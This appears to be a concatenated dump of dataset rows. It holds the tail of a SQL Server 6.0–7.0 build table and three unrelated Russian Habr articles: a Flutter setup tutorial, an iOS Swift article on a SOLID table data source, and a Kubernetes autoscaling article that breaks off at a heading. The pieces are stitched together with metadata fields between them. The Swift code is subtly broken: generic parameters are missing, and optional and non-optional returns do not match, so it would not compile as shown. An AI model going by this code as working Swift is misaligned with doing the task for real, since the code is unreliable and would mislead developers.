| 7.00.722 | [239458 FIX: Replication: Problems Mapping Characters to DB2 OLEDB Subscribers](https://support.microsoft.com/en-us/kb/239458) | 2005-10-05 |
| 7.00.699 | [SQL Server 7.0 Service Pack 1 (SP1)](https://support.microsoft.com/en-us/kb/232570) | 1999-07-01 |
| 7.00.689 | SQL Server 7.0 Service Pack 1 (SP1) Beta | |
| 7.00.677 | SQL Server 7.0 MSDE from Office 2000 disc | |
| 7.00.662 | [232707 FIX: Query with Complex View Hierarchy May Be Slow to Compile](https://support.microsoft.com/en-us/kb/232707) | 2005-10-05 |
| 7.00.658 | [244763 FIX: Access Violation Under High Cursor Stress](https://support.microsoft.com/en-us/kb/244763/) | 2006-03-14 |
| 7.00.657 | [229875 FIX: Unable to Perform Automated Installation of SQL 7.0 Using File Images](https://support.microsoft.com/en-us/kb/229875/) | 2005-10-05 |
| 7.00.643 | [220156 FIX: SQL Cluster Install Fails When SVS Name Contains Special Characters](https://support.microsoft.com/en-us/kb/220156) | 2005-10-05 |
| 7.00.623 | SQL Server 7.0 RTM (Gold, no SP) | 1998-11-27 |
| 7.00.583 | SQL Server 7.0 RC1 | |
| 7.00.517 | SQL Server 7.0 Beta 3 | |
Microsoft SQL Server 6.5 Builds
-------------------------------
| Build | KB / Description | Release Date |
| --- | --- | --- |
| 6.50.480 | [238621 FIX: Integrated Security Sprocs Have Race Condition Between Threads That Can Result in an Access Violation](https://support.microsoft.com/en-us/kb/238621) | 2005-10-07 |
| 6.50.479 | [273914 Microsoft SQL Server 6.5 Post Service Pack 5a Update](https://support.microsoft.com/en-us/kb/273914) | 2000-09-12 |
| 6.50.469 | [249343 FIX: SQL Performance Counters May Cause Handle Leak in WinLogon Process](https://support.microsoft.com/en-us/kb/249343) | |
| 6.50.465 | [250493 FIX: Memory Leak with xp\_sendmail Using Attachments](https://support.microsoft.com/en-us/kb/250493) | |
| 6.50.464 | [275483 FIX: Insert Error (Msg 213) with NO\_BROWSETABLE and INSERT EXEC](https://support.microsoft.com/en-us/kb/275483) | 1999-11-08 |
| 6.50.462 | [238620 FIX: Terminating Clients with TSQL KILL May Cause ODS AV](https://support.microsoft.com/en-us/kb/238620) | |
| 6.50.451 | [236447 FIX: ODS Errors During Attention Signal May Cause SQL Server to Stop Responding](https://support.microsoft.com/en-us/kb/236447) | |
| 6.50.444 | [240172 FIX: Multiple Attachments not Sent Correctly Using xp\_sendmail](https://support.microsoft.com/en-us/kb/240172) | |
| 6.50.441 | [234679 FIX: SNMP Extended Stored Procedures May Leak Memory](https://support.microsoft.com/en-us/kb/234679) | |
| 6.50.422 | [187278 FIX: Large Query Text from Socket Client May Cause Open Data Services Access Violation](https://support.microsoft.com/en-us/kb/187278) | |
| 6.50.416 | [197176 Microsoft SQL Server 6.5 Service Pack 5a (SP5a)](https://support.microsoft.com/en-us/kb/197176) | 1998-12-24 |
| 6.50.415 | Microsoft SQL Server 6.5 Service Pack 5 (SP5) | |
| 6.50.339 | Y2K hotfix | |
| 6.50.297 | "Site Server 3.0 Commerce Edition" hotfix | |
| 6.50.281 | 178295 Microsoft SQL Server 6.5 Service Pack 4 (SP4) | |
| 6.50.259 | 6.5 as included with "Small Business Server" only | |
| 6.50.258 | Microsoft SQL Server 6.5 Service Pack 3a (SP3a) | |
| 6.50.252 | Microsoft SQL Server 6.5 Service Pack 3 (SP3) | |
| 6.50.240 | [160727 Microsoft SQL Server 6.5 Service Pack 2 (SP2)](https://support.microsoft.com/en-us/kb/160727) | |
| 6.50.213 | [153096 Microsoft SQL Server 6.5 Service Pack 1 (SP1)](https://support.microsoft.com/en-us/kb/153096) | |
| 6.50.201 | Microsoft SQL Server 6.5 RTM | 1996-06-30 |
Microsoft SQL Server 6.0 Builds
-------------------------------
| | Build | KB / Description | Release Date |
| --- | --- | --- | --- |
| 6.00.151 | Microsoft SQL Server 6.0 Service Pack 3 (SP3) | |
| 6.00.139 | Microsoft SQL Server 6.0 Service Pack 2 (SP2) | |
| 6.00.124 | Microsoft SQL Server 6.0 Service Pack 1 (SP1) | |
| 6.00.121 | Microsoft SQL Server 6.0 RTM | | | https://habr.com/ru/post/281194/ | null | ru | null |
# Три относительно честных способа создания Flutter проекта

Итак, с презентацией Google первой стабильной версии [**Flutter**](https://flutter.io/), которая случилась 4 декабря 2018 г. начался процесс изменения ландшафта на полях мобильного программирования. Появился новый игрок, способный изменить правила самой игры. Теперь из одной базы кода можно создавать сразу два нативных (т.е. «родных» для среды выполнения) приложения — для iOS и Android. В отличие от т.н. гибридных приложений, которые под капотом используют JavaScript, приложения созданные на Flutter работают быстро и плавно, поскольку код написанный на языке программирования [**Dart**](https://www.dartlang.org/guides/language/language-tour) (для тех кто знаком с Java или C# с этим языком будет комфортно) затем компилируется (AoT, т.е. предварительно) в машинный код: отдельно для Android, и отдельно для iOS.
Поэтому, если вы изучите **Dart** и **Flutter**, вы сможете писать нативные приложения для двух самых популярных мобильных операционных систем, т.е. быть одновременно Android и iOS разработчиком. И это, вероятно, ещё не предел, поскольку было объявлено, что Google ведёт работу по расширению Flutter на предмет возможности создания с его помощью приложений для Windows, Mac и Web (проект Flutter для Web носит название Hummingbird — Колибри). В итоге может получиться так, что зная Dart и Flutter вы сможете писать ~~всё~~ очень многое. Поэтому многие IT эксперты назвали 2018 год — годом Flutter.
### Теперь за дело. Сейчас мы сделаем следующее
1. Установим Flutter SDK, и создадим проект из командной строки Windows.
2. Установим, JDK, Android Studio, плагины для Flutter и Dart, и создадим проект в Android Studio.
3. Установим VS Code, расширения для Flutter и Dart, и создадим проект в VS Code.
### Устанавливаем Flutter и создаём проект из командной строки
Переходим на [страницу установки Flutter](https://flutter.io/docs/get-started/install), выбираем свою операционную систему — Windows, Mac или Linux (здесь будет описано для Windows 10, как наиболее популярной ОС), и скачиваем zip файл, содержащий Flutter SDK. Затем распаковываем zip, например, в папку текущего пользователя, как показано на скриншоте:

Сейчас пропишем путь к *flutter\bin* в переменную *Path* среды пользователя Windows (*Этот компьютер -> Свойства -> Дополнительные параметры системы -> Переменные среды*):

Можно создавать проект из командной строки Windows:
```
flutter create my_app
```

Готово! Файлы проекта можно редактировать любым текстовым редактором, хоть в блокноте. Но это хорошо разве что для мелких правок. Поэтому мы…
### Устанавливаем JDK, Android Studio (вместе с Android SDK) и необходимые плагины
[Скачиваем последнюю версию Java SE Development Kit 8 для своей операционной системы](https://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) (потребуется для Android SDK), устанавливаем на свой компьютер, следуя за мастером установки, и создаём системную переменную среды *JAVA\_HOME* с указанием пути к JDK, например: *C:\Program Files\Java\jdk1.8.0\_201*.

Теперь скачиваем [Android Studio](https://developer.android.com/studio/). Запускаем процесс установки, следуя за мастером установки, и обращаем внимание на путь, куда будет установлен Android SDK. Создаём системную переменную среды *ANDROID\_SDK\_TOOLS* с указанием пути к папке *\tools* в Android SDK, примерно так:

Когда всё готово — запускаем Android Studio, и устанавливаем плагины Flutter и Dart. Для этого в начальном экране Android Studio справа внизу жмём на значок шестерёнки и выбираем Plugins:

В открывшемся окне внизу нажимаем кнопку *Browse repositories...*

В поисковую строку вводим *flutter*, выбираем и устанавливаем (у меня уже установлен, поэтому не видно соответствующей кнопки):

Android Studio предложит также установить плагин Dart от которого зависит работа плагина Flutter. Соглашаемся. В итоге у вас должно быть установлено как минимум два плагина:

Перезапускаем Android Studio, и теперь давайте убедимся, что всё идёт хорошо. Для этого в командной строке выполним команду:
```
flutter doctor
```
Сканирование займёт десяток секунд, и затем вы можете увидите примерно такой результат:

А возможно будет пункт, отмеченный красным крестиком, с пояснением (на английском), что вами ещё не приняты какие-то лицензии (licences), касающиеся Android SDK, и предложение их принять (*Y/n*). Примите их, напечатав в командной строке ***Y***. Возможно это придётся сделать несколько раз (если имеется несколько лицензий).
Вот мы и готовы создать Flutter проект в Android Studio. После установки плагинов Flutter и Dart в начальном экране Android Studio должна появится опция *Start a new Flutter project*. Выбираем её:

Далее соглашаемся с выбранной по умолчанию опцией *Flutter Application* и нажимаем кнопку *Next*:

Указываем название проекта, путь к папке Flutter SDK, путь к папке проекта, даём краткое описание проекта (опционально), и вновь нажимаем кнопку *Next*:

Наконец, указываем доменное имя (которое в реверсивном порядке будит использовано как ID Android приложения), а также опционально — поддержку языков Kotlin и Swift (если не указать — по умолчанию будут поддерживаться только Java и Objective-C). Нажимаем кнопку *Finish*.

В зависимости от производительности компьютера, ждём несколько минут пока проект будет создан… Готово! Он должен выглядеть примерно так:

Обратите внимание на стрелку, указывающую на вкладку *Flutter Inspector*. В этом инспекторе имеется функционал, позволяющий делать ряд очень полезных во время разработки вещей, в т.ч. просмотр приложения на девайсе Android в режиме представления на iOS!
### И наконец, устанавливаем VS Code, расширения, и создаём третий Flutter проект
[Скачиваем последнюю версию Visual Studio Code для своей операционной системы](https://code.visualstudio.com/download), устанавливаем на свой компьютер, следуя за мастером установки, и запускаем VS Code. Затем на боковой панеле нажимаем на кнопку *Extensions* (показана стрелкой) или на клавиатуре — *Ctrl+Shift+X*:

С помощью поиска ищем расширение Flutter.

VS Code, как и в случае с Android Studio, предложит установить необходимое дополнительное расширение Dart. Устанавливаем и его. В итоге должны иметь два (или более) активированных расширения:

А теперь создаём Flutter проект. Нажимаем на значок шестерёнки в левом нижнем углу, и выбираем *Command Pallete...* (или на клавиатуре — *Ctr+Shift+P*). В командной строке Command Pallete начинаем печатать *flutter*, и из появившегося списка выбираем *Flutter: New Project*:

Даём проекту название и нажимаем клавишу *Enter*:

Появится диалоговое окно, предлагающее выбрать папку, в которой необходимо создать Flutter проект. Выбираем и нажимаем кнопку с длинным названием *Select a folder to create the project in*:

Минута ожидания… И, готово!

### Итоги
Мы установили необходимое программное обеспечение (всё бесплатное!), и создали проект Flutter тремя различными способами: из командной строки, с помощью Android Studio, с помощью VS Code. Каким способом создавать проект и в какой среде разработки (IDE) лучше с ним работать — каждый решает сам. Например, я предпочитаю быстро создать проект из командной строки, затем открыть его в VS Code и большую часть времени над проектом работать именно в нём, т.к. VS Code довольно быстрый. Но когда надо хорошо протестировать внешний вид и производительность приложения — открываю проект в Android Studio, чтобы использовать имеющийся пока только там *Flutter Inspector*, обладающий, как я уже говорил, рядом очень полезных опций.
Заключение
----------
На сегодня всё. Другие материалы следуют. Кому подобное читать интересно — подписывайтесь на уведомления о новых публикациях. Подписаться можно на этом сайте (кнопка ***Подписаться*** внизу), или на *Telegram-канал* [***IT Туториал Захар***](https://t.me/it_tutorial_zahar), или на одноимённое [***сообщество в VK***](https://vk.com/it_tutorial_zahar), или *Twitter* [***@mikezaharov***](https://twitter.com/mikezaharov). | https://habr.com/ru/post/437716/ | null | ru | null |
# Избавление от шаблонного кода: как будет выглядеть источник данных?
В [предыдущей статье](https://habr.com/ru/company/psb/blog/588332/) мы начали разбирать, как избавиться от шаблонного многострочного кода в iOS-приложении. В результате сформировали первоначальное представление о том, какие основные архитектурные сущности, классы и протоколы будут каркасом разработанного подхода. В этой статье поговорим о том, каким образом будем получать данные, и покажем провайдер. Он доступен к использованию в таблицах и в коллекциях.
* Подробно расскажем про переиспользуемый провайдер табличного источника данных
* Покажем использование на конкретном примере
* Опишем результат с позиции [SOLID](https://ru.wikipedia.org/wiki/SOLID_(%D0%BE%D0%B1%D1%8A%D0%B5%D0%BA%D1%82%D0%BD%D0%BE-%D0%BE%D1%80%D0%B8%D0%B5%D0%BD%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D0%BE%D0%B5_%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5))
* Обсудим достоинства и недостатки подхода
В основе решения лежат принципы [SOLID](https://ru.wikipedia.org/wiki/SOLID_(%D0%BE%D0%B1%D1%8A%D0%B5%D0%BA%D1%82%D0%BD%D0%BE-%D0%BE%D1%80%D0%B8%D0%B5%D0%BD%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D0%BE%D0%B5_%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5)). Цель состоит в том, чтобы составляющие элементы нашего подхода были независимыми, не влияющими друг на друга.
Цикл статей:
1. [Общее описание всей схемы](https://habr.com/ru/company/psb/blog/588332/)
2. [Источник данных](https://habr.com/ru/company/psb/blog/589731/)
3. [Провайдер данных](https://habr.com/ru/company/psb/blog/594829/)
4. [Делегат](https://habr.com/ru/company/psb/blog/678354/)
5. Карта соответствия
6. Обзервер
7. Коллекции
8. ...
**Для начала**
1. Создаём проект приложения типа Tabbed App, в котором сразу удаляем 2 UIViewController’а (First, Second) — и файлы, и из storyboard’ов, заменяя их UINavigationController’ами во втором случае
2. В автоматически созданных Xcode’ом табличных контроллерах заменяем UIViewController на static cells
3. Первую ячейку табличного контроллера именуем SimpleArchTableViewController, задаём basic-стиль
4. Создаём новый UIViewController с тем же названием, класс для него, а также от переименованной ячейки протягиваем к нему outlet.
**В чём состоит задача**
Реализовать [табличный источник данных](https://developer.apple.com/documentation/uikit/views_and_controls/table_views/filling_a_table_with_data), с помощью которого можно легко добавлять новые ячейки с любым типом данных в табличку. Обратимся к протоколу UITableViewDataSource, откуда используем 3 метода, необходимых для конфигурации внешнего вида таблицы.
```
class TableViewDataSource: NSObject {
}
extension TableViewDataSource: UITableViewDataSource {
func numberOfSections(in tableView: UITableView) -> Int {
<#code#>
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
<#code#>
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
<#code#>
}
}
```
Класс TableViewDataSource реализовывает протокол UITableViewDataSource в соответствии с [принципом единственной ответственности](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D0%B5%D0%B4%D0%B8%D0%BD%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%BE%D0%B9_%D0%BE%D1%82%D0%B2%D0%B5%D1%82%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%BE%D1%81%D1%82%D0%B8). Ответственность данного класса будет заключаться в возвращении массива ячеек, разбитых по секциям (секция пока может быть всего лишь одна). При этом, чтобы данный класс был переиспользуемым, он не должен знать ничего ни о типе ячеек, которые он возвращает, ни об их идентификаторах, классах и nib’ах. Также он не должен быть завязан на конкретную реализацию view model ячейки — это выполнение [принципа инверсии зависимостей](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D0%B8%D0%BD%D0%B2%D0%B5%D1%80%D1%81%D0%B8%D0%B8_%D0%B7%D0%B0%D0%B2%D0%B8%D1%81%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D0%B5%D0%B9).
**Источник данных**
Для переиспользуемого табличного источника данных нужен провайдер. Он будет скрывать за собой логику преобразования данных, хранящихся в любом возможном виде, к той самой структуре массива ячеек, разбитых по секциям. Это необходимо, чтобы наш источник данных не зависел от входящей коллекции данных. Также не будет необходимости переписывать его при изменении типа коллекции, хранящей данные. Ещё одним плюсом станет возможность использования данного провайдера при работе с UICollectionView (об этом поговорим в одной из будущих статей).
Очевидно, что по [принципу инверсии зависимостей](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D0%B8%D0%BD%D0%B2%D0%B5%D1%80%D1%81%D0%B8%D0%B8_%D0%B7%D0%B0%D0%B2%D0%B8%D1%81%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D0%B5%D0%B9) провайдер данных должен быть закрыт протоколом, определённым на уровне TableViewDataSource.
```
class TableViewDataSource: NSObject {
let dataProvider: ViewModelDataProvider
override init(dataProvider: ViewModelDataProvider) {
self.dataProvider = dataProvider
}
}
protocol ViewModelDataProvider {
func numberOfSections() -> Int
func numberOfRows(inSection section: Int) -> Int
func itemForRow(atIndexPath indexPath: IndexPath) -> ItemViewModel
}
protocol ItemViewModel {
}
```
Протокол ItemViewModel здесь нужен с целью скрытия конкретной реализации данных для ячейки. Отсутствие в нём методов и свойств станет понятным чуть позже. Важно — метод itemForRow(atIndexPath:) возвращает не опциональное значение, поскольку в нашей компании мы предпочитаем диагностировать ошибки на ранней стадии, нежели иметь дело с явно себя не проявляющими проблемами, цена которых будет лишь расти.
Реализуем методы табличного источника данных.
```
func numberOfSections(in tableView: UITableView) -> Int {
return dataProvider.numberOfSections()
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return dataProvider.numberOfRows(inSection: section)
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
guard
let viewModel = dataProvider.itemForRow(atIndexPath: indexPath),
let fabric = cellFabric(viewModel: viewModel)
else {
return UITableViewCell()
}
let cell = fabric.makeCell(for: tableView, at: indexPath, with: viewModel)
return cell
}
```
Подробнее рассмотрим последнюю функцию.
Она:
* получает от провайдера данных view model для нужной ячейки;
* затем выбирает подходящую для view model фабрику ячейки, которая и создаёт соответствующую ячейку, связывая её с view model;
* результат возвращает системе.
Данный код позволяет нам полностью абстрагироваться от реализации ячейки, её класса, идентификатора и прочего. При этом мы получаем все преимущества статической типизации при связывании ячейки с её view model.
За идею и реализацию такого гибкого и удобного механизма хотел бы поблагодарить моего коллегу [@Antonmaster](/users/antonmaster).
Функция, выбирающая фабрику, выглядит следующим образом:
```
func cellFabric(viewModel: ItemViewModel) -> TableViewCellFabric? {
let viewModelType = type(of: viewModel)
let viewModelTypeString = "\(viewModelType)"
return itemViewModelClassToFabricMapping[viewModelTypeString]
}
```
В вышеприведенном коде видно, что в свою очередь фабрика для заданной view model берется по ее классу из словаря соответствия. Сам словарь представлен ниже.
```
private lazy var itemViewModelClassToFabricMapping = [String: TableViewCellFabric]()
public func registerCell(class: Cell.Type,
identifier: String,
for itemViewModelClass: ItemViewModel.Type)
where Cell: UITableViewCell & Configurable {
let cellFabric = GenericTableViewCellFabric(cellIdentifier: identifier)
let itemViewModelTypeString = "\(itemViewModelClass)"
itemViewModelClassToFabricMapping[itemViewModelTypeString] = cellFabric
}
```
Функция registerCell отвечает за его наполнение.
Generic-тип регистрируемой ячейки Cell является потомком системной UITableViewCell, реализующим generic-протокол Configurable.
```
public protocol Configurable where Self: UIView {
associatedtype ItemViewModel
var viewModel: ItemViewModel? { get set }
}
```
Протокол просто указывает, что view может быть конфигурируема с помощью view model. В нашем случае generic-тип Cell указывает конфигурируемую ячейку таблицы.
Фабрики ячеек закрыты следующим протоколом, определяющим их поведение таким образом, что каждая фабрика умеет работать лишь с ячейками с одним-единственным, заранее заданным идентификатором.
```
protocol TableViewCellFabric {
var cellIdentifier: String { get }
func makeCell(for tableView: UITableView,
at indexPath: IndexPath,
with viewModel: ItemViewModel) -> UITableViewCell
}
```
Рассмотрим реализацию протокола на примере класса.
```
class GenericTableViewCellFabric: TableViewCellFabric
where Cell: UITableViewCell & Configurable {
let cellIdentifier: String
func makeCell(for tableView: UITableView,
at indexPath: IndexPath,
with viewModel: ItemViewModel) -> UITableViewCell {
let cell = tableView.dequeueReusableCell(withIdentifier: cellIdentifier,
for: indexPath)
guard
let configurableCell = cell as? Cell,
let viewModel = viewModel as? Cell.ItemViewModel
else {
return cell
}
configurableCell.viewModel = viewModel
return configurableCell
}
init(cellIdentifier: String) {
self.cellIdentifier = cellIdentifier
}
}
```
Данная фабрика в соответствии с [рекомендованным Apple алгоритмом работы](https://developer.apple.com/documentation/uikit/views_and_controls/table_views/filling_a_table_with_data) с таблицами сначала запрашивает у таблицы ячейку с ранее заданным идентификатором. Она сперва приводится к generic-типу Cell, описанному выше, а тип view model проверяется на соответствие типу, используемому для конфигурации ячейки. Если проверки прошли успешно, то происходит связывание ячейки с переданной view model.
**Пример использования источника данных**
Рассмотрим использование источника данных на конкретном примере. Для этого описываем класс ячейки и с помощью протокола задаём её view model.
```
protocol TextViewModelProtocol: ItemViewModel {
var text: String { get }
}
class TextTableViewCell: UITableViewCell, Configurable {
var viewModel: TextViewModelProtocol? {
didSet {
textLabel?.text = viewModel?.text
}
}
}
class TextViewModel: TextViewModelProtocol {
var text: String
init(text: String) {
self.text = text
}
}
```
Здесь didSet-свойства viewModel используются для обновления внешнего вида ячейки. Протокол Configurable реализует взаимодействие между ячейкой и её view model, и тип последней оказывается скрыт, что помогает при мокировании данных во время тестирования, а также соответствует [принципу инверсии зависимостей](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D0%B8%D0%BD%D0%B2%D0%B5%D1%80%D1%81%D0%B8%D0%B8_%D0%B7%D0%B0%D0%B2%D0%B8%D1%81%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D0%B5%D0%B9) [SOLID](https://ru.wikipedia.org/wiki/SOLID_(%D0%BE%D0%B1%D1%8A%D0%B5%D0%BA%D1%82%D0%BD%D0%BE-%D0%BE%D1%80%D0%B8%D0%B5%D0%BD%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D0%BE%D0%B5_%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5)).
Конкретная реализация протокола ViewModelDataProvider - ArrayDataProvider. Она работает с одномерными массивами и используется, чтобы отображать данные в одну секцию UITableView или UICollectionView.
```
class ArrayDataProvider {
let array: [T]
init(array: [T]) {
self.array = array
}
}
extension ArrayDataProvider: ViewModelDataProvider {
func numberOfSections() -> Int {
return 1
}
func numberOfRows(inSection section: Int) -> Int {
return array.count
}
func itemForRow(atIndexPath indexPath: IndexPath) -> ItemViewModel? {
guard
indexPath.row >= 0,
indexPath.row < array.count
else {
return nil
}
return array[indexPath.row]
}
}
```
Собираем всё вместе и инициализируем в FirstViewController.
```
private let viewModels = [
TextViewModel(text: "First Cell"),
TextViewModel(text: "Cell #2"),
TextViewModel(text: "This is also a text cell"),
]
private lazy var dataSource: TableViewDataSource = {
let dataProvider = ArrayDataProvider(array: viewModels)
let dataSource = TableViewDataSource(dataProvider: dataProvider)
dataSource.registerCell(class: TextTableViewCell.self,
identifier: "TextTableViewCell",
for: TextViewModel.self)
return dataSource
}()
override func viewDidLoad() {
super.viewDidLoad()
// Do any additional setup after loading the view.
tableView.dataSource = dataSource
}
```
Последним шагом задаём класс и идентификатор у единственной ячейки-прототипа таблицы FirstViewController в storyboard.
Результатом запуска является UITabbarViewController c двумя вкладками. Пока нас интересует только первая ячейка первой вкладки, при нажатии на которую открывается табличка с тремя ячейками, содержащими различный текст.
**Графическое представление**
Опишем результат с позиции [SOLID](https://ru.wikipedia.org/wiki/SOLID_(%D0%BE%D0%B1%D1%8A%D0%B5%D0%BA%D1%82%D0%BD%D0%BE-%D0%BE%D1%80%D0%B8%D0%B5%D0%BD%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D0%BE%D0%B5_%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5)):
* у каждого блока на данной диаграмме есть одна-единственная ответственность;
* интерфейсы узкоспециализированные;
* число связей между блоками минимально;
* каждый блок, кроме TextViewModel, держится за счёт лишь одной сильной ссылки;
* зависимости нижних компонентов от конкретных реализаций верхних компонентов отсутствуют;
* нижележащие компоненты зависят от абстракций-протоколов, описанных уровнем выше.
Представим реализованный подход графически (сильные связи изображены сплошной линией, а слабые — пунктирной).
**Возможности подхода**
Для демонстрации возможностей подхода сделаем следующее:
1. через storyboard добавляем ещё один прототип ячейки в наш UITableViewController;
2. задаём ему соответственно идентификатор и класс DetailedTextTableViewCell;
3. меняем стиль с Basic на Right Detail;
4. по аналогии создадим новый класс ячейки и протокола view model для неё;
```
protocol DetailedTextViewModelProtocol: TextViewModel {
var detailedText: String { get }
}
class DetailedTextTableViewCell: UITableViewCell, Configurable {
var viewModel: DetailedTextViewModelProtocol? {
didSet {
textLabel?.text = viewModel?.text
detailTextLabel?.text = viewModel?.detailedText
}
}
}
```
5. реализуем протокол view model на примере ячейки параметра настроек. Данная ячейка будет отображать название некоего параметра и его числовое значение:
```
class ValueSettingViewModel: TextViewModel, DetailedTextViewModelProtocol {
var detailedText: String { return String(value) }
var value: Int
init(parameter: String, value: Int) {
self.value = value
super.init(text: parameter)
}
}
```
6. добавляем наши данные в массив данных и регистрируем соответствие идентификатора вновь созданной ячейки с классом вновь созданной view model в контроллере.
```
var array = [
...
ValueSettingViewModel(parameter: "Size", value: 25),
ValueSettingViewModel(parameter: "Opacity", value: 37),
ValueSettingViewModel(parameter: "Blur", value: 13),
]
dataSource.registerCell(class: DetailedTextTableViewCell.self,
identifier: "DetailedTextTableViewCell",
for: ValueSettingViewModel.self)
```
Это все действия, необходимые для добавления в имеющийся контроллер ячейки с новым типом представления, работающей с другим типом данных. При этом ни одна строчка ранее написанного кода не изменилась — [принцип открытости-закрытости](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D0%BE%D1%82%D0%BA%D1%80%D1%8B%D1%82%D0%BE%D1%81%D1%82%D0%B8/%D0%B7%D0%B0%D0%BA%D1%80%D1%8B%D1%82%D0%BE%D1%81%D1%82%D0%B8). Был добавлен класс, описывающий логику представления данных в ячейке, и класс, представляющий сами данные, — [принцип единой ответственности](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D0%B5%D0%B4%D0%B8%D0%BD%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%BE%D0%B9_%D0%BE%D1%82%D0%B2%D0%B5%D1%82%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%BE%D1%81%D1%82%D0%B8).
**Недостатки подхода**
Одно из преимуществ показанного подхода — его простота и понятность. Минимальный порог входа для начала использования данного решения с ходу — middle. Разработчику уровня junior придётся подтягивать базовые знания по основным архитектурным паттернам и языку, чтобы включиться в разработку быстро.
Подход, описанный в статье, хорошо подойдёт как для разработки с нуля, так и для поддержки крупных, долгоиграющих проектов, позволяя сократить кодобазу. Для лёгких приложений, не обладающих объёмным функционалом, это не лучший вариант.
Из недостатков данного подхода стоит отметить невозможность использования нескольких различных типов представления для одной и той же view model в рамках одной таблицы.
Как можно это решить: заменить текущую реализацию соответствия класса вьюмодели и фабрики по созданию соответствующих ячеек на более гибкую реализацию карты соответствий, о которой мы подробно поговорим в одной из будущих статей.
Код используемый в статье можно посмотреть [тут](https://github.com/ws233/SOLIDArch). | https://habr.com/ru/post/589731/ | null | ru | null |
# Проектирование кластеров Kubernetes: как выбрать оптимальную стратегию автомасштабирования

[Pyramids of Egypt by acrosstars22](https://www.deviantart.com/comeonovercn/art/Egypt-piramid-529480169)
Масштабирование нод и узлов в кластере Kubernetes может занять несколько минут, если использовать настройки по умолчанию. Над сокращением этого времени стоит поработать, если возможны периоды взрывного роста нагрузки на сервис.
Команда [Kubernetes aaS VK Cloud Solutions](https://mcs.mail.ru/containers/) перевела статью о том, как задавать размеры узлов кластера, настраивать горизонтальное и кластерное автомасштабирование и выполнять избыточное резервирование ресурсов под кластер для ускорения масштабирования.
Три способа автомасштабирования в Kubernetes
--------------------------------------------
В Kubernetes есть несколько сущностей, относящихся к автомасштабированию, в том числе:
* [Horizontal Pod Autoscaler](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/), HPA,
* [Vertical Pod Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/vertical-pod-autoscaler), VPA,
* [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler), CA.
Эти автоскейлеры относятся к разным категориям, поскольку решают разные задачи.
**Горизонтальный автоскейлер** разработан для увеличения количества реплик в развертываниях. При росте трафика автоскейлер может увеличивать количество реплик, чтобы приложение справлялось с растущим числом запросов.
*Горизонтальный автоскейлер регулярно проверяет такие показатели, как память и ЦП

Если показатели превышают заданный пользователем порог, то автоскейлер создает дополнительные поды*
**Вертикальный автоскейлер** полезен, когда вы больше не можете создавать копии нод, но необходимость обрабатывать больше трафика не отпала.
Например, вы не можете (легко) масштабировать базу данных, добавив новые ноды. Для базы данных может потребоваться сегментирование или настройка реплик, доступных только для чтения. Но вы можете заставить базу данных обрабатывать больше подключений, увеличив доступную для нее память и ЦП. Именно в этом и заключается цель вертикального автомасштабирования — увеличение размера ноды.

*Вам будет недостаточно увеличить количество реплик, чтобы масштабировать БД в Kubernetes

Вы можете создать ноду с бо̒льшим количеством ресурсов. Вертикальный автоскейлер делает это автоматически*
Наконец, **кластерный автоскейлер** подготавливает новую ноду и добавляет ее в кластер, когда в нем заканчиваются ресурсы. Если пустых узлов слишком много, автоскейлер кластера удалит их, чтобы сократить расходы.

*При масштабировании нод в Kubernetes может не хватить места

Кластерный автоскейлер предназначен для увеличения количества узлов в кластере

Вы можете увеличивать количество нод, не беспокоясь об узлах, в которых они создаются. Кластерный автоскейлер сам создаст дополнительные узлы*
Хотя все эти компоненты что-то «автомасштабируют», они не связаны друг с другом, поскольку решают совершенно разные задачи и используют разные концепции и механизмы. Более того, они разрабатываются как отдельные проекты и могут использоваться независимо друг от друга.
Однако масштабирование кластера требует точной настройки автоскейлеров, чтобы они работали согласованно. Давайте разберем это на примере.
Что-то пошло не так с автоматическим масштабированием нод
---------------------------------------------------------
